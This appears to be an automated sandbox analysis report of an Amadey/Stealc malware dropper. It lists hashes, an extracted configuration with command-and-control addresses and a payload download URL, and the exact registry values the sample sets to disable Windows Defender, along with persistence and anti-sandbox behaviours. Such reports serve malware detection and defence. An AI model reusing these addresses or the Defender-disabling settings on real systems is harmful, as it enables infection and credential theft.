Analysis
-
max time kernel
138s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 15:09
Static task
static1
General
-
Target
f5b76ee2f82d8dcc2dd274f1db28f32d.exe
-
Size
938KB
-
MD5
f5b76ee2f82d8dcc2dd274f1db28f32d
-
SHA1
a987208afef07acd1406d8ab4a61a0ba7e2f7777
-
SHA256
5fd7a1d8d4083ed82cff3fce09c63c0945404c8cc37997b79448700cdf218ba5
-
SHA512
0505088b4b5d24137505dff28822ea4d5d10097b7cfa3494d9079d0532c20538b83a2011d8bc62737ebdb5b5ab28692048859a7ed7e1bb6c6253158bde178474
-
SSDEEP
24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0yu:sTvC/MTQYxsWR7a0y
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1820-3098-0x00000000008B0000-0x0000000000D04000-memory.dmp healer behavioral1/memory/1820-3099-0x00000000008B0000-0x0000000000D04000-memory.dmp healer behavioral1/memory/1820-3139-0x00000000008B0000-0x0000000000D04000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" aba3392099.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" aba3392099.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" aba3392099.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" aba3392099.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection aba3392099.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" aba3392099.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" aba3392099.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" aba3392099.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications aba3392099.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" aba3392099.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2836 created 1260 2836 Exam.com 21 PID 3056 created 1260 3056 Exam.com 21 PID 2052 created 1260 2052 Exam.com 21 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f601398bc7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5792319151.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5c7ccbab54.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9e426d06c1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b6a245b7ee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aba3392099.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1376 powershell.exe 28 3068 powershell.exe 37 2244 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1376 powershell.exe 3068 powershell.exe 2244 powershell.exe 2076 powershell.exe 1760 powershell.exe 764 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 15 IoCs
flow pid Process 26 2028 rapes.exe 26 2028 rapes.exe 26 2028 rapes.exe 38 2028 rapes.exe 133 2028 rapes.exe 7 2028 rapes.exe 44 2028 rapes.exe 44 2028 rapes.exe 44 2028 rapes.exe 44 2028 rapes.exe 44 2028 rapes.exe 4 1376 powershell.exe 28 3068 powershell.exe 37 2244 powershell.exe 40 2028 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2660 takeown.exe 2532 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b6a245b7ee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9e426d06c1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b6a245b7ee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aba3392099.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9e426d06c1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5792319151.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5c7ccbab54.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5c7ccbab54.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f601398bc7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f601398bc7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5792319151.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aba3392099.exe -
Executes dropped EXE 30 IoCs
pid Process 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 2028 rapes.exe 1512 9e426d06c1.exe 888 WLbfHbp.exe 2836 Exam.com 532 BIm18E9.exe 2588 c587569be1.exe 372 Exam.com 1804 TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE 1904 BIm18E9.exe 2660 483d2fa8a0d53818306efeb32d3.exe 2020 7IIl2eE.exe 348 Passwords.com 1448 TbV75ZR.exe 3056 Exam.com 2176 f73ae_003.exe 2328 WLbfHbp.exe 2052 Exam.com 1712 84648d4c83.exe 684 apple.exe 696 11.exe 1720 11.exe 2140 BIm18E9.exe 1644 5792319151.exe 2832 b6a245b7ee.exe 2724 BIm18E9.exe 3048 0596495a6d.exe 1820 aba3392099.exe 3300 5c7ccbab54.exe 3660 f601398bc7.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 5792319151.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine b6a245b7ee.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine f601398bc7.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine aba3392099.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 5c7ccbab54.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 9e426d06c1.exe -
Loads dropped DLL 51 IoCs
pid Process 1376 powershell.exe 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 888 WLbfHbp.exe 2492 CMD.exe 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2836 Exam.com 3068 powershell.exe 2028 rapes.exe 2028 rapes.exe 2244 powershell.exe 2028 rapes.exe 2020 7IIl2eE.exe 1236 CMD.exe 2028 rapes.exe 1448 TbV75ZR.exe 1628 CMD.exe 2028 rapes.exe 2028 rapes.exe 2328 WLbfHbp.exe 1612 CMD.exe 2028 rapes.exe 2028 rapes.exe 2320 WerFault.exe 2320 WerFault.exe 2320 WerFault.exe 2320 WerFault.exe 2028 rapes.exe 684 apple.exe 684 apple.exe 684 apple.exe 684 apple.exe 3056 Exam.com 3056 Exam.com 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2052 Exam.com 2052 Exam.com 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe 2028 rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2660 takeown.exe 2532 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features aba3392099.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" aba3392099.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\b6a245b7ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341380101\\b6a245b7ee.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\0596495a6d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341390101\\0596495a6d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\aba3392099.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341400101\\aba3392099.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\c587569be1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341150101\\c587569be1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341160121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\5792319151.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341370101\\5792319151.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a4d5-809.dat autoit_exe behavioral1/files/0x00020000000001d3-2920.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 8 IoCs
pid Process 3040 tasklist.exe 1080 tasklist.exe 988 tasklist.exe 2640 tasklist.exe 2624 tasklist.exe 1596 tasklist.exe 2316 tasklist.exe 236 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2660 TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE 2028 rapes.exe 1512 9e426d06c1.exe 1804 TempGCOQPIBVXC8IYUYJHM1WTYYOO0CRUAOV.EXE 2660 483d2fa8a0d53818306efeb32d3.exe 1644 5792319151.exe 2832 b6a245b7ee.exe 1820 aba3392099.exe 3300 5c7ccbab54.exe 3660 f601398bc7.exe -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe -
Drops file in Windows directory 41 IoCs
description ioc Process File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\IstRepresentative TbV75ZR.exe File opened for modification C:\Windows\AdministratorNhs TbV75ZR.exe File opened for modification C:\Windows\MandateFlashing WLbfHbp.exe File opened for modification C:\Windows\IstRepresentative WLbfHbp.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\FinancingPortable TbV75ZR.exe File opened for modification C:\Windows\SinghCooling TbV75ZR.exe File opened for modification C:\Windows\DollStriking TbV75ZR.exe File opened for modification C:\Windows\ThoseTransit WLbfHbp.exe File opened for modification C:\Windows\DollStriking WLbfHbp.exe File opened for modification C:\Windows\ThinksMartin WLbfHbp.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\IstRepresentative WLbfHbp.exe File opened for modification C:\Windows\SinghCooling WLbfHbp.exe File opened for modification C:\Windows\ThoseTransit WLbfHbp.exe File opened for modification C:\Windows\ThinksMartin WLbfHbp.exe File opened for modification C:\Windows\DollStriking WLbfHbp.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\ThinksMartin TbV75ZR.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\FinancingPortable WLbfHbp.exe File opened for modification C:\Windows\VeryBulk WLbfHbp.exe File opened for modification C:\Windows\FinancingPortable WLbfHbp.exe File opened for modification C:\Windows\AdministratorNhs WLbfHbp.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\VeryBulk TbV75ZR.exe File opened for modification C:\Windows\MandateFlashing TbV75ZR.exe File opened for modification C:\Windows\ThoseTransit TbV75ZR.exe File opened for modification C:\Windows\AdministratorNhs WLbfHbp.exe File created C:\Windows\Tasks\rapes.job TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE File opened for modification C:\Windows\MandateFlashing WLbfHbp.exe File opened for modification C:\Windows\SinghCooling WLbfHbp.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\VeryBulk WLbfHbp.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1660 sc.exe 1284 sc.exe 2840 sc.exe 2828 sc.exe 2708 sc.exe 2440 sc.exe 2988 sc.exe 1960 sc.exe 1508 sc.exe 2332 sc.exe 1896 sc.exe 2560 sc.exe 1592 sc.exe 1916 sc.exe 2880 sc.exe 1792 sc.exe 1376 sc.exe 1004 sc.exe 1728 sc.exe 2060 sc.exe 552 sc.exe 1984 sc.exe 3064 sc.exe 2356 sc.exe 376 sc.exe 2292 sc.exe 580 sc.exe 1448 sc.exe 2392 sc.exe 1060 sc.exe 236 sc.exe 888 sc.exe 3000 sc.exe 3048 sc.exe 2176 sc.exe 2444 sc.exe 2424 sc.exe 1628 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 0596495a6d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c587569be1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 0596495a6d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f601398bc7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempRVYEY510HVKRJJY3LS4JCYM2A6VB1W9E.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WLbfHbp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TbV75ZR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aba3392099.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f5b76ee2f82d8dcc2dd274f1db28f32d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9e426d06c1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c7ccbab54.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BIm18E9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2480 timeout.exe 2008 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2768 taskkill.exe 1996 taskkill.exe 2436 taskkill.exe 1568 taskkill.exe 236 taskkill.exe -
